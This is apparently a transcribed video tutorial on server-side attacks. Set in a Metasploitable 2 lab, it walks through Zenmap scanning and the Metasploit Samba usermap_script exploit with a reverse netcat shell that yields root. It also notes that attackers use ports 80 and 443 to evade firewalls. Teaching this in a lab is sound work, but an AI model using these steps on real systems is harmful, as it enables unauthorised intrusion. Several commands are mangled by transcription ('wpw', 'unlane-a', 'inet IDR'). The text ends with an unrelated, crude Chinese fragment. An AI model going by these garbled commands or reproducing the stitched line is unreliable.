Have you ever wondered how hackers manage to take down entire websites or steal millions of user records from company databases? Today we're going deep into the world of server-side attacks, where a single vulnerable service can give attackers complete control over an entire server. Welcome back to Tech Sky's Ethical Hacking Mastery series. I'm your host, and today we're learning how attackers identify and exploit vulnerable services running on servers. What makes server-side attacks so dangerous? Unlike client-side attacks that target individual users, server-side vulnerabilities can expose thousands or even millions of users' data in a single breach. Companies like Yahoo, LinkedIn, and Equifax learned this lesson the hard way when attackers exploited server vulnerabilities to steal user data. But don't worry, today we're keeping everything legal and ethical. We'll be working in our controlled lab environment using Metasploitable 2 as our target. This is a deliberately vulnerable Linux server designed for practicing these exact techniques. If you haven't set up your lab yet, check out our previous video where we walk through the entire setup process. Now, why did we choose Metasploitable 2 for learning server-side attacks? Because it perfectly represents what many real servers looked like a few years ago, running outdated services with known vulnerabilities. While most companies today are more security conscious, you'd be surprised how many servers still run vulnerable services similar to what we'll exploit today. First, let's boot up our Metasploitable machine. When it starts up, you'll see a simple login screen. The default credentials for Metasploitable are both MSF-admin for the username and password. This might seem too simple, but remember, this machine is designed for practice. In the real world, you'd never want to use such basic credentials. After logging in, we need to find our target's IP address. In a terminal, type ifconfig. This command shows us all the network interfaces and their configurations. Look for the inet IDR field under ETH0 or your primary network interface. Write down this IP address. We'll need it for our attack. Now let's switch over to our attack machine, Kali Linux. Today we're going to use something special called Zenmap. To open Zenmap, simply click its icon in the Applications menu or type Zenmap in a terminal. When it opens, you'll see several fields at the top. The most important one is the target field, where we'll enter the IP address we got from our Metasploitable machine. Before we start our scan, let's talk about what we're actually doing. When we scan a target, we're essentially knocking on every possible door of a building to see which ones are open, what's behind them, and how secure they are. Each port is like a door, and different services hide behind these doors. In Zenmap's profile dropdown, select Intense Scan. This scan type will give us detailed information about what services are running on the target machine. Click the Scan button and watch as Zenmap starts discovering open ports and services. During this time, Zenmap is sending various types of network packets to each port, analyzing how they respond to determine what's running there. While the scan runs, let me explain what we're looking for. Every service running on a computer listens on a specific port number. For example, web servers typically use port 80 or 443. When a port is open, it means there's a service actively accepting connections there. But not all open ports are vulnerable. We're specifically looking for services that might have known security flaws we can exploit. As our scan results come in, we'll see lots of open ports on our Metasploitable machine. This is normal since it's intentionally vulnerable. One particular service catches our attention. On port 139, we see Samba version 3x running. Samba is a service that allows file and printer sharing between Linux and Windows machines. Now, when we see an older version of any service, it's like finding an old lock on a door, one that might have known weaknesses. Let's research what vulnerabilities might exist in this version of Samba. Opening a web browser, we'll search for Samba 3x exploit. We're particularly interested in results from Rapid7's website because they maintain the Metasploit framework, our primary attack tool. Looking through the search results, we find something promising: the username map script command execution vulnerability. This is a serious security flaw that could give us complete control over the target system. Let's understand how this vulnerability works. When Samba processes username mapping scripts, there's a flaw in how it handles certain characters, allowing attackers to inject and execute their own commands. Now it's time to launch Metasploit Framework, our main attack tool. Open a terminal and type MSF console. While it loads, let me explain what Metasploit is. Think of it as a massive toolkit for testing security vulnerabilities. It contains thousands of pre-written exploits, organized in a way that makes them relatively easy to use. When Metasploit finishes loading, we'll type use exploit/multi/samba/usermap_script. This tells Metasploit exactly which exploit we want to use. Type show options to see what we need to configure. The most important option is rhost, which stands for remote host. This is our target's IP address. Set it by typing set rhost, followed by your Metasploitable machine's IP address. Now comes a crucial part that many beginners overlook: choosing the right payload. A payload is the actual code that runs after we successfully exploit the vulnerability. Think of the exploit as picking the lock, and the payload as what we do once we're inside. Type show payloads to see our options. We'll use cmd/unix/reverse_netcat as our payload. This payload will make the target machine connect back to our attacking machine, giving us command line access. Set it by typing set payload cmd/unix/reverse_netcat. Our payload needs some configuration too. Type show options again. Notice we need to set lhost, which is our Kali machine's IP address. Find it using ifconfig in a new terminal. The lhost setting tells the target where to connect back to after we've exploited it. We also need to set lport, the port our target will connect to. While we could use port 80 to better hide our attack traffic, for this demonstration we'll use port 4444. In real-world scenarios, attackers often use common ports like 80 or 443, because this traffic looks like normal web browsing and is less likely to be blocked by firewalls. Before we launch our attack, let's verify all our settings one final time with show options. We should see our target IP set as rhost, our Kali IP set as lhost, and our chosen port set as lport. Now comes the moment of truth. Type exploit and press enter. If everything is configured correctly, you'll see a new session open. This means we've successfully exploited the vulnerability and have a connection to our target system. Let's verify our access. Type wpw to see our current directory, type ID to check our privileges, and amazingly we have root access, the highest level of system privileges possible. Try unlane-a to confirm we're actually on the Metasploitable machine. We can now run any command we want, access any file, or modify any part of the system. This level of access demonstrates why keeping systems updated is absolutely crucial. A single vulnerable service can lead to complete system compromise. In a real-world scenario, an attacker with this level of access could steal sensitive data, modify system files, install malware, or use the system to attack other machines. So how can you protect against attacks like this? First, always keep your systems and software up to date. Security patches exist for a reason. Second, regularly scan your network for vulnerable services. Third, use firewalls to limit access to necessary services only. And finally, monitor your systems for unusual activity that might indicate a compromise. That's all for today's deep dive into system exploitation. In our next video, we'll explore post-exploitation, showing you what an attacker can do after gaining this type of access. If you found this video helpful, don't forget to like, subscribe, and hit that notification bell to stay updated with our ethical hacking series. Remember, knowledge is power in cybersecurity. Understanding these attacks helps us better defend against them. Drop your questions in the comments below, and I'll see you in the next video. Stay safe, and hack ethically.
Make it run, 抱着的包包里，好长的奶子，我。